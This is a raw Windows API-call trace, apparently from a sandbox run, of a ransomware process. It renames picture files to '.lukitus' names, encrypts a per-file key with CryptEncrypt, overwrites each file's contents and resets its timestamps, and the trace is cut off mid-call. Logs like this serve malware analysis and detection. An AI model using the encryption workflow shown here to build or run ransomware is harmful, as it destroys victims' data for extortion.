[0107.727] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.727] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\NHG0O.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\nhg0o.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.727] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\NHG0O.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\nhg0o.jpg"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\F56924BE-9663-41BB-34C63D6D-4A50106C55BE.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\f56924be-9663-41bb-34c63d6d-4a50106c55be.lukitus"), dwFlags=0x9) returned 1 [0107.728] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.728] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.733] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x640, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x640, lpOverlapped=0x0) returned 1 [0107.734] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.734] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x640, lpOverlapped=0x0) returned 1 [0107.734] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.734] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x643d8910, dwHighDateTime=0x1d31760)) [0107.734] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.734] FlushFileBuffers (hFile=0x328) returned 1 [0107.737] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\AT4EGhpKo4u.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\at4eghpko4u.jpg"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcda9b510, ftCreationTime.dwHighDateTime=0x1d2fa4e, ftLastAccessTime.dwLowDateTime=0xb55d00f0, ftLastAccessTime.dwHighDateTime=0x1d3059a, ftLastWriteTime.dwLowDateTime=0xb55d00f0, ftLastWriteTime.dwHighDateTime=0x1d3059a, nFileSizeHigh=0x0, nFileSizeLow=0x3c21)) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.737] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\AT4EGhpKo4u.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\at4eghpko4u.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.738] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\AT4EGhpKo4u.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\at4eghpko4u.jpg"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\F56924BE-9663-41BB-6AE0090E-6CDCB46C0311.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\f56924be-9663-41bb-6ae0090e-6cdcb46c0311.lukitus"), dwFlags=0x9) returned 1 [0107.739] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.739] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.744] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x3c21, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x3c21, lpOverlapped=0x0) returned 1 [0107.744] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.744] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x3c21, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x3c21, lpOverlapped=0x0) returned 1 [0107.745] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.745] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x643d8910, dwHighDateTime=0x1d31760)) [0107.745] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.745] FlushFileBuffers (hFile=0x328) returned 1 [0107.749] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\i2NYxg2uc_Xdiq4.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\i2nyxg2uc_xdiq4.jpg"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5c485b0, ftCreationTime.dwHighDateTime=0x1d3050d, ftLastAccessTime.dwLowDateTime=0x86a0b320, ftLastAccessTime.dwHighDateTime=0x1d301c5, ftLastWriteTime.dwLowDateTime=0x86a0b320, ftLastWriteTime.dwHighDateTime=0x1d301c5, nFileSizeHigh=0x0, nFileSizeLow=0x10600)) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.749] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\i2NYxg2uc_Xdiq4.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\i2nyxg2uc_xdiq4.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.749] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\i2NYxg2uc_Xdiq4.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\i2nyxg2uc_xdiq4.jpg"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\F56924BE-9663-41BB-3B2B7F6F-812656DF84C6.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\f56924be-9663-41bb-3b2b7f6f-812656df84c6.lukitus"), dwFlags=0x9) returned 1 [0107.751] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.751] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.756] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x10600, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x10600, lpOverlapped=0x0) returned 1 [0107.756] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.757] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x10600, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x10600, lpOverlapped=0x0) returned 1 [0107.757] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.757] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x643fea70, dwHighDateTime=0x1d31760)) [0107.757] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.757] FlushFileBuffers (hFile=0x328) returned 1 [0107.760] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\st1os2.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\st1os2.jpg"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb331ea70, ftCreationTime.dwHighDateTime=0x1d2f82f, ftLastAccessTime.dwLowDateTime=0x9c1c1770, ftLastAccessTime.dwHighDateTime=0x1d302b1, ftLastWriteTime.dwLowDateTime=0x9c1c1770, ftLastWriteTime.dwHighDateTime=0x1d302b1, nFileSizeHigh=0x0, nFileSizeLow=0xfafc)) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.760] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.761] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.761] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\st1os2.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\st1os2.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.761] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\st1os2.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\st1os2.jpg"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\F56924BE-9663-41BB-FA0D154B-245888D727E3.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\f56924be-9663-41bb-fa0d154b-245888d727e3.lukitus"), dwFlags=0x9) returned 1 [0107.766] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.766] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.771] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xfafc, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xfafc, lpOverlapped=0x0) returned 1 [0107.771] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.771] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xfafc, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xfafc, lpOverlapped=0x0) returned 1 [0107.772] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.772] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64424bd0, dwHighDateTime=0x1d31760)) [0107.772] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.772] FlushFileBuffers (hFile=0x328) returned 1 [0107.775] GetFileAttributesExW (in: lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x97958)) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.775] CreateFileW (lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.776] MoveFileExW (lpExistingFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), lpNewFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\F56924BE-9663-41BB-85AB3CAB-1A0670314428.lukitus" (normalized: "c:\\users\\public\\pictures\\sample pictures\\f56924be-9663-41bb-85ab3cab-1a0670314428.lukitus"), dwFlags=0x9) returned 1 [0107.777] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.777] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.782] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0107.787] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.787] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0107.788] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x17958, lpNumberOfBytesRead=0x281f598, 